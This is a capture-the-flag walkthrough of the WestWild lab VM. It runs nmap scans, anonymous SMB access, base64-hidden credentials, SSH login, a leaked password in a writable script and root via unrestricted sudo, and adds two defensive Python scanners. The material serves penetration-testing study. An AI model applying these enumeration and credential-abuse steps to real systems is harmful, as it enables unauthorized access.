Information gathering
Host discovery
First check the IP addresses of the attacking host and the target.
ip a
sudo nmap -sn 192.168.1.0/24
Port scanning
sudo nmap -sT --min-rate 10000 -p- 192.168.1.135
Run a detailed scan of the discovered ports.
sudo nmap -sT -sV -sC -O -p22,80,139,445 192.168.1.135
-sV probe service versions
-sC run the default script set
-O detect the operating system version
┌──(kali💋kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p22,80,139,445 192.168.1.135
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-02 15:34 CST
Nmap scan report for 192.168.1.135
Host is up (0.00058s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 6fee95919c62b214cd630a3ef8109eda (DSA)
| 2048 104594fea72f028a9b211a31c5033048 (RSA)
| 256 9794178618e28e7a738e412076ba5173 (ECDSA)
|_ 256 2381c776bb3778ee3b73e255ad813272 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
MAC Address: 00:0C:29:CC:AC:22 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: WESTWILD; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 7h00m02s, deviation: 1h43m55s, median: 8h00m02s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: WESTWILD, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-time:
| date: 2024-08-02T15:35:25
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: westwild
| NetBIOS computer name: WESTWILD\x00
| Domain name: \x00
| FQDN: westwild
|_ System time: 2024-08-02T18:35:25+03:00
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.62 seconds
Port 22 is OpenSSH 6.6.1; the chance of a usable vulnerability on this port is very small, so it goes to the back of the queue. Port 80 serves a web application, and ports 139 and 445 are both Samba.
Next, a UDP scan.
sudo nmap -sU --top-ports 20 192.168.1.135
--top-ports 20 scans the 20 most common ports
┌──(kali💋kali)-[~]
└─$ sudo nmap -sU --top-ports 20 192.168.1.135 255 ⨯
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-02 15:38 CST
Nmap scan report for 192.168.1.135
Host is up (0.00066s latency).
PORT STATE SERVICE
53/udp closed domain
67/udp closed dhcps
68/udp open|filtered dhcpc
69/udp closed tftp
123/udp closed ntp
135/udp closed msrpc
137/udp open netbios-ns
138/udp open|filtered netbios-dgm
139/udp closed netbios-ssn
161/udp closed snmp
162/udp closed snmptrap
445/udp closed microsoft-ds
500/udp closed isakmp
514/udp closed syslog
520/udp closed route
631/udp closed ipp
1434/udp closed ms-sql-m
1900/udp closed upnp
4500/udp closed nat-t-ike
49152/udp closed unknown
MAC Address: 00:0C:29:CC:AC:22 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 35.42 seconds
All four ports found by the TCP scan can be tested over TCP; UDP only becomes relevant if something unusual comes up or we need to dig up new information.
Scan with nmap's built-in vulnerability scripts.
sudo nmap --script=vuln -p22,80,139,445 192.168.1.135
┌──(kali💋kali)-[~]
└─$ sudo nmap --script=vuln -p22,80,139,445 192.168.1.135
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-02 15:46 CST
Nmap scan report for 192.168.1.135
Host is up (0.00052s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:CC:AC:22 (VMware)
Host script results:
|_smb-vuln-ms10-061: false
|_smb-vuln-ms10-054: false
| smb-vuln-regsvc-dos:
| VULNERABLE:
| Service regsvc in Microsoft Windows systems vulnerable to denial of service
| State: VULNERABLE
| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
| while working on smb-enum-sessions.
|_
Nmap done: 1 IP address (1 host up) scanned in 334.71 seconds
Samba testing
Set the web side aside for now; two ports here serve SMB, so the attack surface may be larger.
sudo smbmap -H 192.168.1.135
It lists three SMB shares, but only wave is accessible, so we try to connect to it. No password is needed; just press Enter.
sudo smbclient //192.168.1.135/wave
There are two files here; download them and have a look.
┌──(kali💋kali)-[~/Desktop]
└─$ cat FLAG1.txt
RmxhZzF7V2VsY29tZV9UMF9USEUtVzNTVC1XMUxELUIwcmRlcn0KdXNlcjp3YXZleApwYXNzd29yZDpkb29yK29wZW4K
┌──(kali💋kali)-[~/Desktop]
└─$ cat message_from_aveng.txt
Dear Wave ,
Am Sorry but i was lost my password ,
and i believe that you can reset it for me .
Thank You
Aveng
One is base64-encoded; the other is a note saying that Aveng lost his password and wants wave to reset it.
Decode the base64 string; if decoding fails, it may well be plaintext.
┌──(kali💋kali)-[~/Desktop]
└─$ echo RmxhZzF7V2VsY29tZV9UMF9USEUtVzNTVC1XMUxELUIwcmRlcn0KdXNlcjp3YXZleApwYXNzd29yZDpkb29yK29wZW4K |base64 -d
Flag1{Welcome_T0_THE-W3ST-W1LD-B0rder}
user:wavex
password:door+open
This gives us a username and password.
As an added example (not part of the original walkthrough): a small Python scanner that checks files pulled from a share for credential-looking lines, both in plaintext and after decoding any base64 line, which is how FLAG1.txt above hides them. The two sample files are constructed copies of the ones downloaded above; the regexes are assumed heuristics.

```python
import base64
import binascii
import re

# Constructed sample: the two files pulled from the wave share above.
SHARE_FILES = {
    "FLAG1.txt": "RmxhZzF7V2VsY29tZV9UMF9USEUtVzNTVC1XMUxELUIwcmRlcn0KdXNlcjp3YXZleApwYXNzd29yZDpkb29yK29wZW4K\n",
    "message_from_aveng.txt": "Dear Wave ,\nAm Sorry but i was lost my password ,\n",
}

# Assumed heuristics: a base64-looking line, and a key:value credential line.
B64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")
CRED_RE = re.compile(r"^(user(name)?|pass(word)?|pwd)\s*[:=]\s*(\S+)", re.I | re.M)


def decode_if_base64(line):
    """Return the decoded text for a base64-looking line, else None."""
    line = line.strip()
    if not B64_RE.match(line) or len(line) % 4:
        return None
    try:
        return base64.b64decode(line, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def find_credentials(text):
    """Return [(key, value)] for credential-looking lines in the text itself
    and in the decoded form of every base64-looking line."""
    decoded = [d for d in map(decode_if_base64, text.splitlines()) if d]
    hits = []
    for blob in [text] + decoded:
        for m in CRED_RE.finditer(blob):
            hits.append((m.group(1).lower(), m.group(4)))
    return hits


def scan_share(files):
    """Map file name -> credential hits for every file that has any."""
    report = {}
    for name, body in files.items():
        hits = find_credentials(body)
        if hits:
            report[name] = hits
    return report
```

Run it over a copy of each share's contents and review every file it reports; on this box it reports only FLAG1.txt, with the decoded user and password pair.
<test>
assert decode_if_base64("Dear Wave ,") is None
assert decode_if_base64(SHARE_FILES["FLAG1.txt"]).startswith("Flag1{")
hits = scan_share(SHARE_FILES)
assert list(hits) == ["FLAG1.txt"]
assert hits["FLAG1.txt"] == [("user", "wavex"), ("password", "door+open")]
</test>
That exhausts the two SMB ports. We still have 22 and 80; SSH on 22 can wait, so look at the web service on 80 first.
Web penetration
Visit the page.
Nothing special on the page itself; right-click and view the source.
<!DOCTYPE html>
<html>
<head>
<style>
body {
background-image: url("bkgro.png");
background-color: #ffb500;
background-repeat: no-repeat;
background-attachment: fixed;
background-position: center;
}
</style>
</head>
<body>
</body>
</html>
Nothing there either. Check whether the background image contains hidden data.
┌──(kali💋kali)-[~/Desktop]
└─$ exiftool bkgro.png 127 ⨯
ExifTool Version Number : 12.92
File Name : bkgro.png
Directory : .
File Size : 13 kB
File Modification Date/Time : 2019:07:30 11:03:42+08:00
File Access Date/Time : 2024:08:02 16:19:52+08:00
File Inode Change Date/Time : 2024:08:02 16:19:51+08:00
File Permissions : -rw-r--r--
File Type : PNG
File Type Extension : png
MIME Type : image/png
Image Width : 1280
Image Height : 720
Bit Depth : 8
Color Type : Palette
Compression : Deflate/Inflate
Filter : Adaptive
Interlace : Noninterlaced
SRGB Rendering : Relative Colorimetric
Pixels Per Unit X : 2835
Pixels Per Unit Y : 2835
Pixel Units : meters
Palette : (Binary data 285 bytes, use -b option to extract)
Image Size : 1280x720
Megapixels : 0.922
Nothing useful. Let's first use the information we already have to connect over SSH.
Gaining a foothold with the sensitive information from Samba
Remember the credentials we obtained?
user:wavex
password:door+open
┌──(kali💋kali)-[~]
└─$ sudo ssh wavex@192.168.1.135 130 ⨯
wavex@192.168.1.135's password:
Welcome to Ubuntu 14.04.6 LTS (GNU/Linux 4.4.0-142-generic i686)
* Documentation: https://help.ubuntu.com/
System information as of Fri Aug 2 19:46:01 +03 2024
System load: 0.0 Processes: 164
Usage of /: 78.0% of 1.70GB Users logged in: 0
Memory usage: 10% IP address for eth0: 192.168.1.135
Swap usage: 0%
Graph this data and manage this system at:
https://landscape.canonical.com/
Your Hardware Enablement Stack (HWE) is supported until April 2019.
Last login: Fri Aug 2 19:46:01 2024 from 192.168.1.128
wavex@WestWild:~$
Access obtained. First the usual three commands.
wavex@WestWild:~$ whoami
wavex
wavex@WestWild:~$ uname -a
Linux WestWild 4.4.0-142-generic #168~14.04.1-Ubuntu SMP Sat Jan 19 11:28:33 UTC 2019 i686 i686 i686 GNU/Linux
wavex@WestWild:~$ sudo -l
[sudo] password for wavex:
Sorry, user wavex may not run sudo on WestWild.
wavex@WestWild:~$
We can look at /home. There are two directories under it.
wavex@WestWild:~$ cd /home
wavex@WestWild:/home$ ls
aveng wavex
wavex@WestWild:/home$ cd wavex
wavex@WestWild:~$ ls-liah
ls-liah: command not found
wavex@WestWild:~$ ls -liah
total 36K
69673 drwxr-xr-x 4 wavex wavex 4.0K Aug 2 19:46 .
7684 drwxr-xr-x 4 root root 4.0K Jul 30 2019 ..
69900 -rw------- 1 wavex wavex 5 Aug 2 19:46 .bash_history
69674 -rw-r--r-- 1 wavex wavex 220 Jul 30 2019 .bash_logout
66935 -rw-r--r-- 1 wavex wavex 3.6K Jul 30 2019 .bashrc
69882 drwx------ 2 wavex wavex 4.0K Aug 2 2019 .cache
611 -rw-r--r-- 1 wavex wavex 675 Jul 30 2019 .profile
69690 -rw------- 1 wavex wavex 870 Aug 2 2019 .viminfo
69679 drwxrwxrwx 2 nobody nogroup 4.0K Jul 30 2019 wave
wavex@WestWild:~$
Let's look at the vim editing history of the user wavex.
cat .viminfo
wavex@WestWild:~$ cat .viminfo
# This viminfo file was generated by Vim 7.4.
# You may edit it if you're careful!
# Value of 'encoding' when this file was written
*encoding=utf-8
# hlsearch on (H) or off (h):
~h
# Command Line History (newest to oldest):
:!bash
:x
# Search String History (newest to oldest):
# Expression History (newest to oldest):
# Input Line History (newest to oldest):
# Input Line History (newest to oldest):
# Registers:
# File marks:
'0 1 0 /etc/passwd
'1 2 0 ~/wave/flag1.txt
'2 2 0 ~/wave/flag1.txt
# Jumplist (newest first):
-' 1 0 /etc/passwd
-' 2 0 ~/wave/flag1.txt
-' 1 0 ~/wave/flag1.txt
-' 1 0 /etc/shadow
-' 2 0 ~/wave/flag1.txt
-' 1 0 ~/wave/flag1.txt
-' 2 0 ~/wave/flag1.txt
-' 1 0 ~/wave/flag1.txt
# History of marks within files (newest to oldest):
> /etc/passwd
" 1 0
> ~/wave/flag1.txt
" 2 0
^ 2 0
. 1 2
+ 1 2
wavex@WestWild:~$
/etc/passwd shows up in the history, so check the permissions on it.
wavex@WestWild:~$ ls -liah /etc/passwd
69678 -rw-r--r-- 1 root root 1.3K Jul 30 2019 /etc/passwd
Only read permission, it seems.
Next, check for scheduled tasks.
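As an added example (not part of the original walkthrough): a Python triage script that pulls file marks, jumplist entries, and ex-command history out of a .viminfo like the one above, then flags sensitive system files and shell escapes (:! commands). The sample content is a constructed, trimmed copy of the wavex .viminfo shown above; SENSITIVE is an assumed watchlist.

```python
import re

# Constructed sample: a trimmed copy of the wavex .viminfo shown above.
SAMPLE_VIMINFO = """\
# This viminfo file was generated by Vim 7.4.
# Command Line History (newest to oldest):
:!bash
:x
# File marks:
'0 1 0 /etc/passwd
'1 2 0 ~/wave/flag1.txt
# Jumplist (newest first):
-' 1 0 /etc/passwd
-' 1 0 /etc/shadow
-' 2 0 ~/wave/flag1.txt
# History of marks within files (newest to oldest):
> /etc/passwd
" 1 0
> ~/wave/flag1.txt
" 2 0
"""

# Assumed watchlist: files whose appearance in a user's vim history deserves a look.
SENSITIVE = ("/etc/passwd", "/etc/shadow", "/etc/sudoers", "/etc/crontab")

MARK_RE = re.compile(r"^(?:'.|-')\s+\d+\s+\d+\s+(\S.*)$")  # file marks and jumplist
FILE_RE = re.compile(r"^>\s+(\S.*)$")                       # per-file mark history


def parse_viminfo(text):
    """Return (files, commands): paths in first-seen order, ex-commands as listed."""
    files, commands, section = {}, [], None
    for line in text.splitlines():
        if line.startswith("# "):
            section = line[2:]          # section headers start with "# "
            continue
        if section and section.startswith("Command Line History") and line.startswith(":"):
            commands.append(line)
            continue
        m = MARK_RE.match(line) or FILE_RE.match(line)
        if m:
            files.setdefault(m.group(1), True)
    return list(files), commands


def triage(text):
    """Flag sensitive files touched and shell escapes run from inside vim."""
    files, commands = parse_viminfo(text)
    return {
        "sensitive_files": [f for f in files if f in SENSITIVE],
        "shell_escapes": [c for c in commands if c.startswith(":!")],
        "all_files": files,
    }
```

On the sample it reports /etc/passwd and /etc/shadow as sensitive files and the :!bash shell escape, which is exactly the kind of activity a defender would want to see in a per-user history review.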
wavex@WestWild:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
Apparently none. Next, look for writable files.
find / -writable -type f ! -path '/proc/*' 2>/dev/null
-writable writable by the current user
! -path '/proc/*' exclude this path
2>/dev/null discard error messages
wavex@WestWild:~$ find / -writable -type f ! -path '/proc/*' 2>/dev/null
/sys/fs/cgroup/systemd/user/1001.user/2.session/tasks
/sys/fs/cgroup/systemd/user/1001.user/2.session/cgroup.procs
/sys/kernel/security/apparmor/policy/.remove
/sys/kernel/security/apparmor/policy/.replace
/sys/kernel/security/apparmor/policy/.load
/sys/kernel/security/apparmor/.remove
/sys/kernel/security/apparmor/.replace
/sys/kernel/security/apparmor/.load
/sys/kernel/security/apparmor/.ns_name
/sys/kernel/security/apparmor/.ns_level
/sys/kernel/security/apparmor/.ns_stacked
/sys/kernel/security/apparmor/.stacked
/sys/kernel/security/apparmor/.access
/usr/share/av/westsidesecret/ififoregt.sh
/home/wavex/.cache/motd.legal-displayed
/home/wavex/wave/FLAG1.txt
/home/wavex/wave/message_from_aveng.txt
/home/wavex/.bash_history
/home/wavex/.profile
/home/wavex/.bashrc
/home/wavex/.viminfo
/home/wavex/.bash_logout
wavex@WestWild:~$
Open the file /usr/share/av/westsidesecret/ififoregt.sh
cat /usr/share/av/westsidesecret/ififoregt.sh
wavex@WestWild:~$ cat /usr/share/av/westsidesecret/ififoregt.sh
#!/bin/bash
figlet "if i foregt so this my way"
echo "user:aveng"
echo "password:kaizen+80"
A new username and password. Switch user directly and move laterally to that account.
su aveng
aveng@WestWild:/home/wavex$ whoami
aveng
aveng@WestWild:/home/wavex$ cd ../aveng
aveng@WestWild:~$ ls -liah
total 28K
69176 dr-xr-xr-x 3 aveng aveng 4.0K Aug 2 2019 .
7684 drwxr-xr-x 4 root root 4.0K Jul 30 2019 ..
13771 -rw-r--r-- 1 aveng aveng 220 Jul 30 2019 .bash_logout
13504 -rw-r--r-- 1 aveng aveng 3.6K Jul 30 2019 .bashrc
69632 drwx------ 2 aveng aveng 4.0K Jul 30 2019 .cache
716 -rw-r--r-- 1 aveng aveng 675 Jul 30 2019 .profile
69667 -rw------- 1 aveng aveng 511 Jul 30 2019 .viminfo
sudo privilege escalation to root
Use sudo -l to check the permissions
aveng@WestWild:~$ sudo -l
[sudo] password for aveng:
Matching Defaults entries for aveng on WestWild:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User aveng may run the following commands on WestWild:
(ALL : ALL) ALL
That is full root via sudo, so this is very simple.
sudo /bin/bash
aveng@WestWild:~$ sudo /bin/bash
root@WestWild:~# whoami
root
root@WestWild:~#
There is also a flag2 file in the /root directory.
root@WestWild:~# cd /root
root@WestWild:/root# ls
FLAG2.txt
root@WestWild:/root# cat FLAG2.txt
Flag2{Weeeeeeeeeeeellco0o0om_T0_WestWild}
Great! take a screenshot and Share it with me in twitter @HashimAlshareff